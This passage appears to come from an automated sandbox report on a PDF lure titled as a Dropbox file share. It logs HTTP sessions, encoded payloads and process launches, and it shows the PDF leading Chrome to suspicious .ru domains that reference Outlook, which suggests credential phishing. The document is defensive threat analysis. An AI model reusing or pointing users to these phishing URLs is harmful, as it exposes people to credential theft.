                                                                                                        Data Ascii: cf-chl-out-s: IIiZdiDgEpC7vc5G9uTryz1/oaiehHEj9swSV4adAqTaDkjjocKXHKsPztG77waEcacp18trkNxRdBJ1HdWTpCC3hwa5kExmBT3eHLRbemVUGb+Thfy0ov+Iz+RxS/5dsfUygmtvzZrZtoChY179I0QMjm8YGUg5pz99ZRN4lJnfvzkDcqnm1fhEHUXaX/0NEaRBTXnNisZIQ6nkQyyxXUbPxqgoS1ZEC6MyOwkiAC65ht+xd
                                                                                                        2024-12-18 17:51:21 UTC1109INData Raw: 5a 48 64 47 6a 55 69 52 69 4a 46 6f 63 4a 43 58 61 70 42 61 61 31 69 4f 56 35 71 56 6d 56 53 54 6e 47 4e 79 58 35 74 30 68 4a 4f 59 69 57 70 38 6a 61 6d 66 70 4a 39 31 72 58 43 77 69 70 53 53 74 49 36 59 6f 4c 4f 70 73 71 4f 79 70 48 32 59 65 72 79 37 68 35 53 38 76 4b 71 63 77 4b 71 65 71 70 36 73 70 74 4b 78 6c 35 61 32 75 72 65 33 76 74 53 34 6f 35 61 79 35 2b 69 77 32 4d 71 7a 74 4d 61 2b 78 2b 44 78 37 72 33 44 34 50 66 46 73 4f 62 5a 78 66 6e 33 35 38 65 34 2f 4e 2f 63 38 2f 58 51 30 2f 50 43 32 38 54 34 78 4f 63 4b 2b 77 66 7a 43 76 77 4b 47 42 55 53 38 67 4d 61 2b 42 44 7a 2b 66 37 59 37 75 73 61 49 68 4c 6c 4a 79 66 6e 4a 66 55 44 43 69 58 75 42 77 59 72 43 43 49 4c 49 7a 6b 6b 4a 43 38 48 2b 67 73 4a 49 6b 4d 74 4f 42 34 64 42 43 41 48 51 7a 56
                                                                                                        Data Ascii: ZHdGjUiRiJFocJCXapBaa1iOV5qVmVSTnGNyX5t0hJOYiWp8jamfpJ91rXCwipSStI6YoLOpsqOypH2Yery7h5S8vKqcwKqeqp6sptKxl5a2ure3vtS4o5ay5+iw2MqztMa+x+Dx7r3D4PfFsObZxfn358e4/N/c8/XQ0/PC28T4xOcK+wfzCvwKGBUS8gMa+BDz+f7Y7usaIhLlJyfnJfUDCiXuBwYrCCILIzkkJC8H+gsJIkMtOB4dBCAHQzV
                                                                                                        2024-12-18 17:51:21 UTC1369INData Raw: 62 32 48 30 4d 79 79 73 70 4b 2b 75 4b 53 75 6d 4d 4f 55 6d 63 75 39 77 64 79 72 31 74 62 66 6e 4d 2f 48 33 4d 76 4a 75 75 6a 65 78 38 48 6f 30 4e 2b 76 79 61 6a 68 31 76 65 73 30 38 71 35 33 66 43 35 76 64 6e 63 76 65 49 41 34 50 72 6d 34 65 4d 41 41 75 62 73 41 39 6f 52 43 50 44 71 30 77 54 50 34 67 62 34 2b 68 6e 73 41 65 38 52 44 42 44 79 41 79 45 55 48 2f 34 64 42 53 41 69 44 42 77 50 4a 53 51 52 37 42 63 45 4b 66 41 35 38 79 34 4d 43 42 30 78 2f 41 73 32 4a 42 55 47 44 79 55 6f 45 78 6f 6e 47 79 63 63 50 41 6b 4f 4d 54 49 6b 4d 30 6f 79 4f 45 30 78 4e 68 51 2f 54 54 30 61 53 6b 46 43 48 56 56 61 55 6b 68 6d 53 30 56 65 4c 6c 35 50 54 6d 51 7a 56 43 34 79 61 6c 4e 4b 63 54 52 63 63 45 64 78 57 46 42 30 4f 57 38 2b 51 6e 68 77 61 6d 64 70 5a 55 5a 76
                                                                                                        Data Ascii: b2H0MyyspK+uKSumMOUmcu9wdyr1tbfnM/H3MvJuujex8Ho0N+vyajh1ves08q53fC5vdncveIA4Prm4eMAAubsA9oRCPDq0wTP4gb4+hnsAe8RDBDyAyEUH/4dBSAiDBwPJSQR7BcEKfA58y4MCB0x/As2JBUGDyUoExonGyccPAkOMTIkM0oyOE0xNhQ/TT0aSkFCHVVaUkhmS0VeLl5PTmQzVC4yalNKcTRccEdxWFB0OW8+QnhwamdpZUZv
                                                                                                        2024-12-18 17:51:21 UTC1369INData Raw: 72 58 6b 38 4b 73 71 36 33 4c 7a 73 69 7a 7a 37 43 30 31 2b 58 47 35 71 48 65 70 71 58 6b 79 73 6a 59 78 73 43 6f 72 4b 58 65 72 38 32 78 30 4f 2b 33 32 66 58 58 32 64 72 4a 38 38 4c 4e 31 51 63 42 38 4d 4c 78 41 51 72 46 31 75 54 65 33 38 2f 52 30 68 50 70 39 76 44 58 79 2f 6a 6c 45 68 58 73 39 2f 44 64 49 68 6f 64 47 2f 34 55 2b 2b 41 6e 41 69 34 6b 49 51 51 79 2f 66 41 49 2f 65 7a 74 37 51 50 30 39 42 41 49 4f 50 77 56 44 44 52 44 47 51 38 64 50 44 63 7a 45 79 63 57 50 79 55 6d 52 51 6c 4e 4c 6b 46 47 55 6b 67 6b 55 69 64 46 4f 44 6b 57 48 44 6f 2b 4d 31 6c 41 57 45 4e 48 52 56 74 48 61 30 6c 46 62 55 6c 4f 61 46 34 77 51 32 59 78 52 46 56 4f 4d 6b 67 36 56 44 31 53 53 6c 6b 39 56 55 78 65 56 6c 42 55 65 57 74 57 51 6d 71 4f 52 31 74 2b 66 6b 79 44 6a
                                                                                                        Data Ascii: rXk8Ksq63Lzsizz7C01+XG5qHepqXkysjYxsCorKXer82x0O+32fXX2drJ88LN1QcB8MLxAQrF1uTe38/R0hPp9vDXy/jlEhXs9/DdIhodG/4U++AnAi4kIQQy/fAI/ezt7QP09BAIOPwVDDRDGQ8dPDczEycWPyUmRQlNLkFGUkgkUidFODkWHDo+M1lAWENHRVtHa0lFbUlOaF4wQ2YxRFVOMkg6VD1SSlk9VUxeVlBUeWtWQmqOR1t+fkyDj
                                                                                                        2024-12-18 17:51:21 UTC625INData Raw: 55 73 73 66 48 77 61 37 57 76 35 32 68 32 74 47 30 79 70 7a 4b 34 64 7a 6a 7a 4e 44 5a 79 39 2f 45 31 74 50 53 72 37 62 54 35 66 44 38 35 75 44 7a 75 63 48 74 76 76 7a 63 34 2f 76 43 31 2f 6a 6e 78 65 62 74 79 51 48 66 36 76 48 52 35 77 6a 54 43 75 66 32 36 77 6e 65 43 42 63 64 45 51 7a 65 38 76 73 56 43 50 66 36 42 67 77 68 49 68 76 71 43 77 51 4f 46 41 38 30 4b 51 66 31 4d 79 66 32 39 67 38 67 44 69 30 41 49 50 35 42 50 54 63 2b 49 77 4d 37 51 79 73 73 4f 68 30 4f 4c 45 4e 49 45 68 52 46 4e 6a 67 71 52 7a 6c 64 59 45 68 56 49 6a 74 43 48 31 56 62 50 31 34 7a 48 55 30 6d 54 33 42 59 50 53 70 71 59 79 31 75 52 56 4a 58 64 57 39 6e 53 6d 70 62 61 58 59 36 57 32 49 2b 68 59 42 6a 5a 33 31 6f 66 49 4f 4a 61 57 70 65 62 34 6c 79 5a 47 39 6f 67 49 32 43 62 48
                                                                                                        Data Ascii: UssfHwa7Wv52h2tG0ypzK4dzjzNDZy9/E1tPSr7bT5fD85uDzucHtvvzc4/vC1/jnxebtyQHf6vHR5wjTCuf26wneCBcdEQze8vsVCPf6BgwhIhvqCwQOFA80KQf1Myf29g8gDi0AIP5BPTc+IwM7QyssOh0OLENIEhRFNjgqRzldYEhVIjtCH1VbP14zHU0mT3BYPSpqYy1uRVJXdW9nSmpbaXY6W2I+hYBjZ31ofIOJaWpeb4lyZG9ogI2CbH


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        26192.168.2.750036104.18.94.414439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:51:22 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2000292729:1734542240:X0lCKVmzbenQfrsiKz-FVaH0wGrZC2Dr08uWAScPXbQ/8f40fce70d2b43c1/V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:51:23 UTC379INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 18 Dec 2024 17:51:22 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        cf-chl-out: nJi92hPt3u16uFckGM4gd3LKfUM9iPZVHWA=$KUqPbjB1pb4g2bZv
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f4100287d3d4338-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 17:51:23 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        27192.168.2.750038104.21.16.14439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:51:24 UTC683OUTGET /2815371938891542802263491yJBPbQZLSFPTSJAWIKGTDOOOEEOMQPMQZPNTEEAALCAFSAAXYGMKJTTGBHYMNGSV HTTP/1.1
                                                                                                        Host: kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://4r.tatcharc.ru
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://4r.tatcharc.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:51:25 UTC901INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 17:51:25 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ggGR1Z6jkPzCEoQmBWla0kc7WjepQbcBMkRMArXIN%2B4lFOoHgaoFb5svYn6miEA9PBxuFWTOSbV57MVS1m2%2Bw%2By3ZSRcDEg5eXqXvHIyC%2BEDMXBaZCTbgLYx7uA%2FK5PMLeowELh4EjsTK67JRKEp%2FwwAo9f8LkNJ1qx%2FZs720KOB6J5YwLg0xAQOrVR2zWx0AQrwbLofqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f410032ded38ce0-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1859&min_rtt=1859&rtt_var=929&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4194&recv_bytes=1261&delivery_rate=406119&cwnd=206&unsent_bytes=0&cid=e8a1e9f0a520cb2a&ts=981&x=0"
                                                                                                        2024-12-18 17:51:25 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                        Data Ascii: 11
                                                                                                        2024-12-18 17:51:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        28192.168.2.75004052.98.61.344439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:51:27 UTC678OUTGET / HTTP/1.1
                                                                                                        Host: www.outlook.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        Referer: https://4r.tatcharc.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:51:28 UTC629INHTTP/1.1 301 Moved Permanently
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Location: https://outlook.live.com/
                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                        request-id: 89798590-c1f2-432e-1039-f5722e25cfe8
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        X-FEServer: DX1P273CA0031
                                                                                                        X-RequestId: e3175940-6681-4950-8638-14fc55c1e08a
                                                                                                        Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                                                                        X-FEProxyInfo: DX1P273CA0031.AREP273.PROD.OUTLOOK.COM
                                                                                                        X-FEEFZInfo: DXB
                                                                                                        MS-CV: kIV5ifLBLkMQOfVyLiXP6A.0
                                                                                                        X-Powered-By: ASP.NET
                                                                                                        X-FEServer: DX1P273CA0031
                                                                                                        Date: Wed, 18 Dec 2024 17:51:00 GMT
                                                                                                        Connection: close
                                                                                                        Content-Length: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        29192.168.2.750042104.21.16.14439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:51:27 UTC481OUTGET /2815371938891542802263491yJBPbQZLSFPTSJAWIKGTDOOOEEOMQPMQZPNTEEAALCAFSAAXYGMKJTTGBHYMNGSV HTTP/1.1
                                                                                                        Host: kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:51:29 UTC901INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 17:51:28 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9pOldWRLMEqCYSls2tmUd%2BgpkhhWQ7%2BaGAXMk%2FBH6LQot43AGSu4ccob8xIzG5CGrZaDOUENfNhAzxb8VFimxB9E8NXrUFPPeS9KpmdYnIG%2FFtNVBpEJKOzScpM5eH1IDYe6hjVzdbRNph96GSn4QY0aI7Cq3sSyx%2FMuRRIuFYbLRpi6KEY5ivp8fJynE3lRMl%2FScMuHCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f410049897a7293-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2006&rtt_var=779&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1059&delivery_rate=1380614&cwnd=158&unsent_bytes=0&cid=ac7b426d6570e2e7&ts=1128&x=0"
                                                                                                        2024-12-18 17:51:29 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                        Data Ascii: 11
                                                                                                        2024-12-18 17:51:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        30192.168.2.75004352.98.200.2424439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:51:30 UTC679OUTGET / HTTP/1.1
                                                                                                        Host: outlook.live.com
                                                                                                        Connection: keep-alive
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Referer: https://4r.tatcharc.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:51:30 UTC633INHTTP/1.1 302 Moved Temporarily
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Location: https://outlook.live.com/owa/
                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                        request-id: 8588a7a7-88cf-23cd-a685-ba32696cf2d1
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        X-FEServer: MR1P264CA0185
                                                                                                        X-RequestId: b6559479-a2d3-433d-bc2d-a0ebbe91defc
                                                                                                        Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                                                                        X-FEProxyInfo: MR1P264CA0185.FRAP264.PROD.OUTLOOK.COM
                                                                                                        X-FEEFZInfo: MRS
                                                                                                        MS-CV: p6eIhc+IzSOmhboyaWzy0Q.0
                                                                                                        X-Powered-By: ASP.NET
                                                                                                        X-FEServer: MR1P264CA0185
                                                                                                        Date: Wed, 18 Dec 2024 17:51:29 GMT
                                                                                                        Connection: close
                                                                                                        Content-Length: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        31192.168.2.75004452.98.200.2424439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:51:32 UTC683OUTGET /owa/ HTTP/1.1
                                                                                                        Host: outlook.live.com
                                                                                                        Connection: keep-alive
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Referer: https://4r.tatcharc.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:51:33 UTC2974INHTTP/1.1 302
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Content-Length: 245
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Expires: -1
                                                                                                        Location: https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0
                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                        request-id: 3297f253-d537-0470-258f-a5fbad594235
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        X-CalculatedFETarget: PA7P264CU020.internal.outlook.com
                                                                                                        X-BackEndHttpStatus: 302
                                                                                                        Set-Cookie: ClientId=FAC13D50FB754A33B6368BDF57F3EE76; expires=Thu, 18-Dec-2025 17:51:32 GMT; path=/;SameSite=None; secure
                                                                                                        Set-Cookie: ClientId=FAC13D50FB754A33B6368BDF57F3EE76; expires=Thu, 18-Dec-2025 17:51:32 GMT; path=/;SameSite=None; secure
                                                                                                        Set-Cookie: RoutingKeyCookie=; expires=Sun, 18-Dec-1994 17:51:32 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        Set-Cookie: HostSwitchPrg=; expires=Sun, 18-Dec-1994 17:51:32 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        Set-Cookie: OptInPrg=; expires=Sun, 18-Dec-1994 17:51:32 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        Set-Cookie: logonLatency=LGN01=638701410929260387; domain=live.com; path=/; secure; HttpOnly
                                                                                                        Set-Cookie: ClientId=FAC13D50FB754A33B6368BDF57F3EE76; expires=Thu, 18-Dec-2025 17:51:32 GMT; path=/;SameSite=None; secure
                                                                                                        Set-Cookie: RoutingKeyCookie=; expires=Sun, 18-Dec-1994 17:51:32 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        Set-Cookie: HostSwitchPrg=; expires=Sun, 18-Dec-1994 17:51:32 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        Set-Cookie: OptInPrg=; expires=Sun, 18-Dec-1994 17:51:32 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        Set-Cookie: logonLatency=LGN01=638701410929260387; domain=live.com; path=/; secure; HttpOnly
                                                                                                        Set-Cookie: X-OWA-RedirectHistory=AmVSIGQBY7f6m4wf3Qg; expires=Wed, 18-Dec-2024 23:53:32 GMT; path=/;SameSite=None; secure; HttpOnly
                                                                                                        X-CalculatedBETarget: PR0P264MB4481.FRAP264.PROD.OUTLOOK.COM
                                                                                                        X-BackEndHttpStatus: 302
                                                                                                        X-RUM-Validated: 1
                                                                                                        X-RUM-NotUpdateQueriedPath: 1
                                                                                                        X-RUM-NotUpdateQueriedDbCopy: 1
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-BeSku: WCS6
                                                                                                        X-OWA-DiagnosticsInfo: 6;0;0;
                                                                                                        X-BackEnd-Begin: 2024-12-18T17:51:32.926
                                                                                                        X-BackEnd-End: 2024-12-18T17:51:32.926
                                                                                                        X-DiagInfo: PR0P264MB4481
                                                                                                        X-BEServer: PR0P264MB4481
                                                                                                        X-UA-Compatible: IE=EmulateIE7
                                                                                                        X-ResponseOrigin: OwaAppPool
                                                                                                        X-Proxy-RoutingCorrectness: 1
                                                                                                        X-Proxy-BackendServerStatus: 302
                                                                                                        X-FEProxyInfo: MR1P264CA0179.FRAP264.PROD.OUTLOOK.COM
                                                                                                        X-FEEFZInfo: MRS
                                                                                                        X-FEServer: PA7P264CA0300
                                                                                                        Report-To: {"group":"NelOfficeUpload1","max_age":7200,"endpoints":[{"url":"https://exo.nel.measure.office.net/api/report?TenantId=&FrontEnd=Cafe&DestinationEndpoint=MRS&RemoteIP=8.46.123.0&Environment=MT"}],"include_subdomains":true}
                                                                                                        NEL: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                                                                                                        Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                                                                        X-FirstHopCafeEFZ: MRS
                                                                                                        X-FEServer: MR1P264CA0179
                                                                                                        Date: Wed, 18 Dec 2024 17:51:32 GMT
                                                                                                        Connection: close
                                                                                                        2024-12-18 17:51:33 UTC245INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 65 6e 2d 75 73 2f 6d 69 63 72 6f 73 6f 66 74 2d 33 36 35 2f 6f 75 74 6c 6f 6f 6b 2f 65 6d 61 69 6c 2d 61 6e 64 2d 63 61 6c 65 6e 64 61 72 2d 73 6f 66 74 77 61 72 65 2d 6d 69 63 72 6f 73 6f 66 74 2d 6f 75 74 6c 6f 6f 6b 3f 64 65 65 70 6c 69 6e 6b 3d 25 32 66 6f 77 61 25 32 66 26 61 6d 70 3b 73 64 66 3d 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&amp;sdf=0">here</a>.</h2></body></html>


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:4
                                                                                                        Start time:12:48:31
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\A file has been sent to you via DROPBOX.pdf"
                                                                                                        Imagebase:0x7ff702560000
                                                                                                        File size:5'641'176 bytes
                                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:7
                                                                                                        Start time:12:48:32
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                        Imagebase:0x7ff6c3ff0000
                                                                                                        File size:3'581'912 bytes
                                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:9
                                                                                                        Start time:12:48:32
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1728,i,8237484978916821895,3345354816588044964,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                        Imagebase:0x7ff6c3ff0000
                                                                                                        File size:3'581'912 bytes
                                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:16
                                                                                                        Start time:13:52:52
                                                                                                        Start date:18/12/2024
                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://4R.tatcharc.ru/hdlV/"
                                                                                                        Imagebase:0x7ff6c4390000
